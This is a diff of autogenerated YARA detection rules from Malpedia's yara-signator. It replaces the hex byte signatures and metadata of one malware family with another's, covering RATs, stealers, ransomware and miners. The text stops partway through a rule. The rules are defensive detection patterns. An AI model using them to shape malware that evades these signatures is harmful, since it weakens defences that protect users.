"0ce73fa8ff409c8b46cae101a5ed771c097f4c9fb16c4b873e6cf25053373d48" score = 75 quality = 75 tags = "FILE" @@ -149564,32 +152394,32 @@ rule MALPEDIA_Win_Sedll_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6a00 6a00 8d8424b0030000 } - $sequence_1 = { 50 ff15???????? 8b4df8 85c9 7407 } - $sequence_2 = { 74e3 57 33c9 33ff 85db 0f848f000000 } - $sequence_3 = { 56 6800010000 8d85f0feffff 8bf1 6880000000 50 } - $sequence_4 = { 8d842484010000 50 8d842498030000 50 ff15???????? } - $sequence_5 = { 6a00 53 e8???????? 83c410 6a00 6a00 ff75f4 } - $sequence_6 = { ff15???????? 85c0 7523 85ff } - $sequence_7 = { 57 6aff ff75fc 6a00 6a00 ffd3 8bc7 } - $sequence_8 = { 8b4514 8908 a1???????? 50 } - $sequence_9 = { 7604 8bf8 2bfb 8d7701 56 } + $sequence_0 = { 898df4feffff 894dc0 8b4f14 898decfeffff 894df8 8b4d0c 0fb601 } + $sequence_1 = { 33f1 8b4de8 8bd0 2345d4 3355d4 2355c8 33d0 } + $sequence_2 = { 0fb6c5 6a04 0bd0 0fb6c1 6800300000 c1e208 53 } + $sequence_3 = { 039d28ffffff 13bd24ffffff 035d94 137d98 81c338b548f3 81d75bc25639 015df4 } + $sequence_4 = { 0fa4ca17 c1ee09 c1e117 0bda 8b55dc 0bf1 8b4de0 } + $sequence_5 = { 8bfa 8b4dd4 8bf1 337de8 3375f4 237dac 2355e8 } + $sequence_6 = { 897dfc 8bbd34ffffff 8bf7 8bcf c1e618 0facd108 } + $sequence_7 = { 3375ec 8b55e8 2355c0 2375d4 33fa 8b4df4 234dec } + $sequence_8 = { 03c3 8945b8 13cf 33ff 894de0 } + $sequence_9 = { c1e108 0bc8 0fb64604 c1e108 0bc8 894b14 0f114318 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Fatal_Rat_Auto : FILE +rule MALPEDIA_Win_Screencap_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ad01455e-ebcc-5d76-97a6-8783411925c1" + id = "104aba67-45fe-5a81-add7-5f096073514f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fatal_rat_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.screencap_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "bf12fac2d058bbab9ea0f9b93b84c2577fb8a36680f2394444c1c24a4d7c12b7" + logic_hash = "d12bc6cdd7eeaf3c014435658ac08460e21def542afb74f89d01054fc70f3f9a" score = 75 quality = 75 tags = "FILE" @@ -149603,32 +152433,32 @@ rule MALPEDIA_Win_Fatal_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 807dff00 742f 8b4e10 56 034df4 68???????? } - $sequence_1 = { 55 8bec 8b4508 33d2 3bc2 7432 8b481c } - $sequence_2 = { 833d????????02 7513 68???????? 8d851cffffff 50 e8???????? 59 } - $sequence_3 = { c645bb46 c645bc6f c645bd72 c645be6d 885dbf ff15???????? } - $sequence_4 = { 8b7df8 899e90000000 80662d00 8bce e8???????? 8b8e90000000 8b4614 } - $sequence_5 = { 48 eb05 8b462c 2bc1 8945f0 8b4508 8b0485d0b40110 } - $sequence_6 = { c685e0fdffff2e c685e1fdffff65 c685e2fdffff78 c685e3fdffff65 889de4fdffff c645946b c6459573 } - $sequence_7 = { 8981a4af0600 5d c3 c3 c3 55 8bec } - $sequence_8 = { 33db a5 a5 53 8d8520feffff 6a2e 50 } - $sequence_9 = { ff15???????? 53 56 50 a3???????? ff15???????? 80a5ecfbffff00 } + $sequence_0 = { 488b4c2450 488364242000 488d0591e90000 488b0cc8 4c8d4c2458 488d542460 498b0c0f } + $sequence_1 = { 41c1eb05 418d5f01 41c1e302 83fe08 } + $sequence_2 = { 4883ec20 4c8d25a09c0000 33f6 33db 498bfc 837f0801 7526 } + $sequence_3 = { 39842420100000 0f869f010000 6a04 687c334700 55 e8???????? } + $sequence_4 = { 488bce ff15???????? bf00080000 3bdf 7702 } + $sequence_5 = { 72ed 48833d????????00 741f 488d0d06130100 e8???????? } + $sequence_6 = { 8bdf e8???????? 85ff 741c 488d4c2450 0fb601 84c0 } + $sequence_7 = { 3bf8 0f869c000000 6a04 687c334700 55 e8???????? } + $sequence_8 = { 8d854c100000 50 ff15???????? 8bf0 8975e0 85f6 0f84bb030000 } + $sequence_9 = { 89470c 894710 894714 8d854c2c0000 50 e8???????? 6805040000 } condition: - 7 of them and filesize <344064 + 7 of them and filesize <1391616 } -rule MALPEDIA_Win_Unidentified_074_Auto : FILE +rule MALPEDIA_Win_Flusihoc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0d21a50a-0481-57c8-ac0f-f7fe46c9359f" + id = "78da62a5-c798-5ed3-b0d2-4c7f68889a1b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_074_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flusihoc_auto.yar#L1-L168" license_url = "N/A" - logic_hash = "e6b5821f00996c51a196dd1c4d62a76bb0e0925ea653a38d0c3db163875f48e7" + logic_hash = "9c728cded699d733d4c529cd8d0e45713d382315b1100a325978e10da75fc22d" score = 75 quality = 75 tags = "FILE" @@ -149642,32 +152472,38 @@ rule MALPEDIA_Win_Unidentified_074_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ffb578dfffff e8???????? 33c0 c7858cdfffff07000000 c78588dfffff00000000 66898578dfffff } - $sequence_1 = { 50 e8???????? 6aff 6a01 83ec08 c745fc00000000 8d4dd8 } - $sequence_2 = { 3bc1 7432 8b4d08 8d041e 8a0408 3a02 7516 } - $sequence_3 = { 50 ff15???????? 8bf0 85f6 0f84c4010000 837f1000 } - $sequence_4 = { 50 899d6cdfffff c78568dfffff00000000 660fd645e4 e8???????? } - $sequence_5 = { c78524e7ffff07000000 66898510e7ffff 8d85f8e6ffff 50 8d8540e7ffff c78520e7ffff00000000 50 } - $sequence_6 = { 8d4e01 8a06 46 84c0 75f9 8d4588 } - $sequence_7 = { e8???????? 83c40c 019dc4feffff 8b85c4feffff } - $sequence_8 = { 83ec08 8845f0 8d45f0 50 e8???????? 884435e8 } - $sequence_9 = { 8d8d70e7ffff 6a12 33c0 c78584e7ffff07000000 } + $sequence_0 = { 8bec 83e4f8 81ece40b0000 a1???????? } + $sequence_1 = { 53 56 57 6a40 8d442428 6a00 50 } + $sequence_2 = { 50 f3a5 c684246402000000 e8???????? } + $sequence_3 = { a1???????? 33c4 89842450160000 53 56 8b7508 57 } + $sequence_4 = { 52 ffd6 6a0a ff15???????? } + $sequence_5 = { 7507 80864d01000004 83f822 7506 } + $sequence_6 = { ffd3 8b442410 6aff 50 ff15???????? } + $sequence_7 = { 50 f3a5 c684246401000000 e8???????? 83c40c } + $sequence_8 = { 6a00 50 c744242c44000000 e8???????? } + $sequence_9 = { 83f822 7506 fe8e42010000 3d14010000 7506 } + $sequence_10 = { 8b8c245c160000 5f 5e 5b 33cc 33c0 e8???????? } + $sequence_11 = { ff15???????? 8b4c2410 51 ffd6 8b542414 52 ffd6 } + $sequence_12 = { 3d68010000 7505 fe06 fe4e17 83f834 7503 fe4e18 } + $sequence_13 = { 51 6a00 ff15???????? 8d95f4feffff 52 6806000200 } + $sequence_14 = { 6804010000 8d85f8feffff 50 6a01 } + $sequence_15 = { 68???????? 6802000080 ff15???????? 85c0 752f 8b8df4feffff } condition: - 7 of them and filesize <335872 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Atmitch_Auto : FILE +rule MALPEDIA_Win_Broler_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5a61b640-3c5c-5518-8891-5d83a0b89c2d" + id = "5abffeef-f83b-5c44-9f6f-38ecebdd4974" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmitch_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.broler_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "565ce987fa9e005b7e196a8bfd57c4f682eb318d752a50049029192ea9e40f26" + logic_hash = "a9e85383ead8a369d8ed21ea68b384350908e471fda84214a900f85e6e6d4412" score = 75 quality = 75 tags = "FILE" @@ -149681,32 +152517,32 @@ rule MALPEDIA_Win_Atmitch_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c644244803 ff15???????? 8d4c2418 51 68???????? } - $sequence_1 = { 33c4 89842410020000 56 51 8bcc } - $sequence_2 = { 8bfe f7df 896c241c 0fb744242c 50 51 } - $sequence_3 = { 51 833d????????00 7422 a1???????? 50 } - $sequence_4 = { ff15???????? e8???????? 8b0e 8b5138 83c408 } - $sequence_5 = { c744241c00000000 b8???????? c60000 83c004 3d???????? 7cf3 68???????? } - $sequence_6 = { 8bcc 89642410 68???????? ff15???????? e8???????? 0fb705???????? 83c408 } - $sequence_7 = { ff15???????? 83bc24fc00000000 7432 8b4c2408 8b41f4 } - $sequence_8 = { c644244803 ff15???????? 8d4c2418 51 68???????? 8d542428 52 } - $sequence_9 = { 83c404 50 ff15???????? 50 51 } + $sequence_0 = { 6a00 68???????? 50 68???????? 56 ff15???????? 898520dffcff } + $sequence_1 = { 39b820b54100 0f8491000000 ff45e4 83c030 3df0000000 72e7 81ffe8fd0000 } + $sequence_2 = { e8???????? 83c404 33c0 8845f0 8945f1 8945f5 668945f9 } + $sequence_3 = { 8d8db0dffcff 51 ba???????? e8???????? } + $sequence_4 = { e8???????? 83c404 33ff be0f000000 89b588fdffff 89bd84fdffff c68574fdffff00 } + $sequence_5 = { 33ff 3bcf 7564 c743140f000000 897b10 b8???????? } + $sequence_6 = { 898ed4030000 8b5004 8996d8030000 8b4808 } + $sequence_7 = { 899d50fdffff ff15???????? 8b9550fdffff 52 8d45a8 68???????? 50 } + $sequence_8 = { e8???????? e9???????? 50 8d459c 50 } + $sequence_9 = { 895910 c741140f000000 8d5508 89a51cdffcff 8819 52 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <275456 } -rule MALPEDIA_Win_Derohe_Auto : FILE +rule MALPEDIA_Win_Get2_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "082c8bb6-5e90-542b-87a2-cd5536e22be3" + id = "f91c1425-fc52-545b-9271-7db19be38856" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.derohe_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.get2_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "3afbf42b0aba27d1df54ba6496f4a588ae2f7c7ec09fa3d922d168dfad26c783" + logic_hash = "5e9d36a39aed19f2ddf758df0012d6d0406c361deba19029a1cb530866b49568" score = 75 quality = 75 tags = "FILE" @@ -149720,32 +152556,38 @@ rule MALPEDIA_Win_Derohe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd0 8b542404 c60424e3 8b02 ffd0 8b542404 c6042405 } - $sequence_1 = { ffd0 8b542404 c604247d 8b02 ffd0 8b542404 c60424df } - $sequence_2 = { ffd0 8b542404 c60424a1 8b02 ffd0 8b542404 c60424e8 } - $sequence_3 = { ffd0 8b442418 8b4c2414 8b542420 898a8c010000 8b0d???????? 85c9 } - $sequence_4 = { ffd0 8b542404 c60424de 8b02 ffd0 8b542404 c60424b8 } - $sequence_5 = { ffd0 8b542404 c60424cc 8b02 ffd0 8b542404 c6042462 } - $sequence_6 = { e8???????? 8b44241c 8b4c2420 8b542424 8b5c2434 894b08 89530c } - $sequence_7 = { ffd0 8b542404 c604247d 8b02 ffd0 8b542404 c60424a4 } - $sequence_8 = { ffd2 8b442404 83c0fa 83f801 0f869e000000 90 8b4c242c } - $sequence_9 = { ffd0 8b542404 c60424e0 8b02 ffd0 8b542404 c6042407 } + $sequence_0 = { 8b4004 f644080c06 74d5 8d4d84 e8???????? 8d4584 c645fc03 } + $sequence_1 = { 0f859a000000 f6c104 7430 8d4c2404 e8???????? } + $sequence_2 = { e8???????? ff7510 8d4dc0 ff750c e8???????? 83c420 83781410 } + $sequence_3 = { 57 53 8d4dd8 e8???????? 8bc6 e8???????? c3 } + $sequence_4 = { 33c0 895dd4 668945d8 51 51 52 } + $sequence_5 = { 8d44240c 68???????? 50 eb69 f6c102 8d4c2404 742b } + $sequence_6 = { 8b4910 23c8 0f849e000000 807d0c00 } + $sequence_7 = { 897e08 33db c745ec07000000 43 897de8 } + $sequence_8 = { 0f95c3 8bc3 488b5c2450 488b4c2448 } + $sequence_9 = { 4533f6 4863df 488d0dbc730200 488bc3 83e33f } + $sequence_10 = { 4885ff 75eb 33c0 48894110 } + $sequence_11 = { 488bc8 0fb7045e 663901 740f 48ffc3 493bde } + $sequence_12 = { 663931 7451 488d1590280100 e8???????? 85c0 7441 } + $sequence_13 = { 7203 488b00 668938 488d8b40010000 } + $sequence_14 = { 85c0 750d ff15???????? 41898660010000 4032ff } + $sequence_15 = { 488b4708 4a8b4cf008 488b4618 4c3b24c8 0f85d0fbffff 488b4648 } condition: - 7 of them and filesize <35788800 + 7 of them and filesize <720896 } -rule MALPEDIA_Win_Cerbu_Miner_Auto : FILE +rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "77652d6a-745f-5552-8901-83bf555706f4" + id = "d30a73fa-e439-581b-821f-0f94e7403477" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cerbu_miner_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.arkei_stealer_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "e4927a587588bc11053fcbade5bb9500364c9a656d383eb318cc8486464f3cce" + logic_hash = "9f5b37522725bf35fb4c723079a0799c573d27f50c2c2a0cc7a8a66eafb6f502" score = 75 quality = 75 tags = "FILE" @@ -149759,32 +152601,32 @@ rule MALPEDIA_Win_Cerbu_Miner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 88b42480000000 eb3f 83e902 7433 83e904 7413 83e909 } - $sequence_1 = { 7412 48 8d0d0b360500 48 83c428 48 ff25???????? } - $sequence_2 = { 8d4601 c643012e 48 63c8 41 8d4602 48 } - $sequence_3 = { 85d2 7427 85c9 b800040000 41 b800080000 44 } - $sequence_4 = { f6473801 7402 eb18 48 8bcf ff15???????? f6473801 } - $sequence_5 = { e9???????? 45 8bfd 44 89ad50010000 e9???????? 44 } - $sequence_6 = { 48 89442420 e8???????? 48 8bd7 48 8bcb } - $sequence_7 = { 89b42418010000 8b74242c 83feff 7515 837f0c00 7c0f 48 } - $sequence_8 = { 8d057b52f9ff 48 894518 c745b0e6070000 48 c745c000000200 48 } - $sequence_9 = { 44 2bc0 44 8903 33c0 48 8b5c2438 } + $sequence_0 = { 8d55c4 52 6a18 50 ff15???????? 85c0 } + $sequence_1 = { 8be5 5d c3 50 8b45e8 } + $sequence_2 = { 894614 897e24 ff15???????? 8bd8 3bdf 0f84e3feffff } + $sequence_3 = { 8bf0 ffd3 8bd8 53 56 } + $sequence_4 = { 56 53 52 57 50 51 ff15???????? } + $sequence_5 = { 8b00 50 ff15???????? 83f8ff 740b a810 7507 } + $sequence_6 = { 85c0 0f8458feffff 8b4e20 6a00 8d45e4 50 8d148d28000000 } + $sequence_7 = { 8bf0 c70628000000 8b4dc8 894e04 8b55cc 895608 668b45d4 } + $sequence_8 = { 8b7614 6a00 8d45e4 50 56 } + $sequence_9 = { 56 894590 ff15???????? 8bf8 897d94 83ffff } condition: - 7 of them and filesize <1040384 + 7 of them and filesize <1744896 } -rule MALPEDIA_Win_Smominru_Auto : FILE +rule MALPEDIA_Win_Lightwork_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f9ca05ba-f03e-5436-9d57-424a2dfc3ab2" + id = "c390e16c-2dcc-559e-9fd3-76f19a07f767" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smominru_auto.yar#L1-L162" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightwork_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "bda67966371ffe5669f600e524bbc69b988d40d47c3737672a3d574c8f6a0cdf" + logic_hash = "61817aa90179df111fa397aa30e99207b20a485779bb2cd0f0c3ecbb28869217" score = 75 quality = 75 tags = "FILE" @@ -149798,38 +152640,32 @@ rule MALPEDIA_Win_Smominru_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b474c 894610 8b4750 894614 8b4754 894618 } - $sequence_1 = { 0fb7c0 8d4dac 51 50 6a01 } - $sequence_2 = { 8bd8 eb06 3b4628 0f94c3 } - $sequence_3 = { 0f84694ac17b f6c140 0f856f4ac17b 8ad1 80e23f } - $sequence_4 = { 8bd8 eb06 47 ff4df0 } - $sequence_5 = { 8bd8 eb02 b301 8bc7 } - $sequence_6 = { 8bd8 eb06 ff45f0 4f } - $sequence_7 = { 8bd8 eb02 33db 837dfc00 } - $sequence_8 = { 6aff e8???????? 85c0 0f8c05e5c07b } - $sequence_9 = { ff15???????? 3d03010000 0f8447a0b17b 85c0 0f8c3fa0b17b } - $sequence_10 = { 8b37 8975e0 85f6 0f842bfebb7b 83feff 0f8422febb7b 8b5f14 } - $sequence_11 = { 8bd8 eb09 55 e8???????? 59 } - $sequence_12 = { 0f8c21f7b07b 0fbe75f4 6bf630 e8???????? 8b402c 648b0d18000000 56 } - $sequence_13 = { 0f8c79feab7b 8d45c4 50 e8???????? 8b45f0 } - $sequence_14 = { 8bd8 e9???????? 8d4df8 8bd7 8bc6 e8???????? 8d4df4 } - $sequence_15 = { 8bd8 eb0a 8d45f0 e8???????? } + $sequence_0 = { 0fb7442462 89442404 8b442464 890424 e8???????? } + $sequence_1 = { c3 55 89e5 83ec38 8b4508 83c07c 8945f0 } + $sequence_2 = { e8???????? 894508 837d0800 740b 8b4508 890424 } + $sequence_3 = { c645f700 807df700 0f85b1feffff 8b45ec 890424 e8???????? 8b45f0 } + $sequence_4 = { c9 c3 55 89e5 83ec28 c7042408000000 e8???????? } + $sequence_5 = { 8b4014 83c003 8945f4 8b450c } + $sequence_6 = { 894508 837d0800 741e 8b4508 890424 e8???????? } + $sequence_7 = { 8b45f8 83c002 01d0 0fb600 0fb6c0 c1e010 0145fc } + $sequence_8 = { e8???????? 8b4508 c780a401000000000000 90 c9 c3 55 } + $sequence_9 = { 894508 837d0800 740b 8b4508 890424 e8???????? 8b4508 } condition: - 7 of them and filesize <8167424 + 7 of them and filesize <1132544 } -rule MALPEDIA_Win_Shapeshift_Auto : FILE +rule MALPEDIA_Win_Hazy_Load_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "08e6a360-def4-58d5-989a-762ada20c1ff" + id = "f9ce3341-35f2-576a-ac44-5d1a215a7e85" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shapeshift_auto.yar#L1-L105" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hazy_load" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hazy_load_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "c522b147cc687acbd3ced32f880a4cbfad89b8f069e6c6ec7d0ae0159c8619d1" + logic_hash = "2293495fdcc042b4bc9589ccdd3e32857e18de0ce6c242812538dc1d663eb294" score = 75 quality = 75 tags = "FILE" @@ -149843,30 +152679,32 @@ rule MALPEDIA_Win_Shapeshift_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 33d2 b93b110f00 f7f1 68???????? 8915???????? e8???????? } - $sequence_1 = { 6a00 6a07 68000000c0 51 ff15???????? } - $sequence_2 = { 8b45fc 817848d0f74100 7409 ff7048 e8???????? } - $sequence_3 = { 394508 7c1f 3934bd38054200 7531 e8???????? 8904bd38054200 } - $sequence_4 = { 6a00 57 e8???????? 8b5dfc 83c410 8b35???????? 53 } - $sequence_5 = { 8365fc00 8b049d38054200 8b4de0 f644082801 7515 e8???????? c70009000000 } - $sequence_6 = { c3 3b0d???????? f27502 f2c3 f2e987080000 } - $sequence_7 = { 6a0c 7550 e8???????? 83c404 8bf8 } + $sequence_0 = { b904000000 4c8d05f5c50000 488d15aeb20000 e8???????? 488bf8 4885c0 740f } + $sequence_1 = { 48897c2408 488b15???????? 488d3dd16d0100 8bc2 b940000000 83e03f 2bc8 } + $sequence_2 = { 488d0db8200100 4183e23f 4903e8 832700 498bf0 } + $sequence_3 = { 488bf1 41bc02000000 4489742420 418bcc 448d4205 ff15???????? } + $sequence_4 = { 4b87bcf750140200 33c0 488b5c2450 488b6c2458 488b742460 } + $sequence_5 = { 483b0d???????? 7417 488d0570630100 483bc8 740b 83791000 7505 } + $sequence_6 = { 4883675000 488d05ade0ffff 83675800 488d4f28 } + $sequence_7 = { 488d15a96a0100 83e13f 488bc5 48c1f806 48c1e106 } + $sequence_8 = { 442bc3 4803d0 4533c9 488bce ff15???????? 85c0 0f8eacfeffff } + $sequence_9 = { 488d0dc0210100 4183e23f 4903e8 832300 } condition: - 7 of them and filesize <303104 + 7 of them and filesize <315392 } -rule MALPEDIA_Win_Nestegg_Auto : FILE +rule MALPEDIA_Elf_Hideandseek_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "01b2e0f8-b92c-591f-a2fe-591e7cf3b6b4" + id = "8886e955-536d-56f5-a630-bf2b9ef8b07e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nestegg_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.hideandseek_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "d01d8400ee78b6e2d5585ed1b0eb91726b08169614c693b823bb545acd7b28b3" + logic_hash = "c312d2a4b534a00f51e15be6e1572c868a1bf84ffb4d93cf13ce0449e347f5bb" score = 75 quality = 75 tags = "FILE" @@ -149880,32 +152718,32 @@ rule MALPEDIA_Win_Nestegg_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d5710 6a02 52 8bce e8???????? } - $sequence_1 = { 83c40c 83feff 7417 ffd7 } - $sequence_2 = { 8b0d???????? 81c120030000 51 ff15???????? 8b0d???????? 39991c030000 } - $sequence_3 = { 83f80e 0f84d8000000 83f80f 7520 8d4c2430 56 } - $sequence_4 = { 56 8bf1 89742404 c706???????? 8b8e24030000 c744241000000000 } - $sequence_5 = { 85c9 740c 8a09 83e107 8d14c1 89542410 } - $sequence_6 = { 8b10 6a10 51 8bc8 885c2458 ff5214 } - $sequence_7 = { c644242f6e c644243065 c644243233 884c2433 885c2434 88542435 } - $sequence_8 = { c644240d73 884c240e c644240f5f c644241033 } - $sequence_9 = { e8???????? 8d4c2410 6a04 51 8bce c7442418ff020001 e8???????? } + $sequence_0 = { 53 83ec14 8b44242c 8a5c2430 ff7004 ff74242c e8???????? } + $sequence_1 = { e8???????? 83c410 84c0 752e 83ec0c 8d84241c120000 50 } + $sequence_2 = { 8d44244c 50 e8???????? 5b 8d442440 50 e8???????? } + $sequence_3 = { 89ca 8b0424 0fa4d91e 31c8 8b4c2430 0fa4d31e 8b542404 } + $sequence_4 = { 7411 0f821e040000 83f802 0f8508040000 eb04 50 50 } + $sequence_5 = { be00000000 b800000000 c1e210 09c6 c1e718 31db 0fb64504 } + $sequence_6 = { 50 e8???????? 83c410 84c0 741a 8b542414 c7434403000000 } + $sequence_7 = { 817e0c00010000 751a 8d5610 8d4650 53 68c0000000 50 } + $sequence_8 = { 56 53 8b7c2410 803d????????00 7561 83ec0c 6800000011 } + $sequence_9 = { 50 8b8424ec000000 ff7008 e8???????? 89f2 8b8424f0000000 } condition: - 7 of them and filesize <221184 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Gandcrab_Auto : FILE +rule MALPEDIA_Win_Wastedlocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8fb97f0d-f07e-528f-846a-617ae03e5a0b" + id = "b7e51866-b49c-5bda-b9e7-206c33d8d8a8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gandcrab_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wastedlocker_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "51f7c1543a06dc758514ed4496666d6ea311b3c69b16117153a658edbbb8509b" + logic_hash = "f3876fe06c43f4da1aa2e85c3923ddbcdfed237d9e82449557581810436fb80c" score = 75 quality = 75 tags = "FILE" @@ -149919,34 +152757,34 @@ rule MALPEDIA_Win_Gandcrab_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? ff7728 8bf0 ff15???????? 03c3 8d5e04 } - $sequence_1 = { 7403 83c314 837f7400 741b ff777c ff15???????? ff7778 } - $sequence_2 = { 8d5e04 03d8 837f2400 741b ff772c } - $sequence_3 = { ff774c 8bf0 ff15???????? 03c3 8d5e04 03d8 } - $sequence_4 = { 03c3 8d5e04 03d8 837f5400 741b } - $sequence_5 = { 03c3 8d5e04 03d8 837f3000 741b } - $sequence_6 = { ff774c 8bf0 ff15???????? 03c3 8d5e04 } - $sequence_7 = { 837f1800 741b ff7720 ff15???????? } - $sequence_8 = { 03d8 837f6000 7403 83c314 837f7400 741b ff777c } - $sequence_9 = { ff15???????? 03c3 8d5e04 03d8 837f3000 } + $sequence_0 = { e8???????? 8bf0 ff7508 6a00 ff35???????? ff15???????? 5f } + $sequence_1 = { 8945e4 8d45dc 50 c745dc18000000 897de0 } + $sequence_2 = { 50 e8???????? 83c40c 56 8d85c8f1ffff 53 50 } + $sequence_3 = { ffd3 8bf8 85ff 7419 6a20 57 ffd3 } + $sequence_4 = { 8d45ec 50 8d45d4 50 6816011200 } + $sequence_5 = { 3b45d0 0f8382000000 894dd8 394de0 740b 0fb703 034710 } + $sequence_6 = { ff35???????? ff15???????? 5f ff75f8 ff15???????? } + $sequence_7 = { 6a00 ff35???????? ff15???????? 8bd8 85db 7469 8b450c } + $sequence_8 = { 2500f0ffff 56 0500100000 50 56 b812345607 } + $sequence_9 = { bf04010000 ffd3 8bf0 85f6 746a 57 56 } condition: - 7 of them and filesize <1024000 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Disttrack_Auto : FILE +rule MALPEDIA_Win_Blackbasta_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2e51f756-65a0-5587-a62f-f2956dec5749" + id = "5c8e56ab-6cbd-5deb-8276-9c7c1c51570f" date = "2023-12-06" modified = "2023-12-08" - reference = 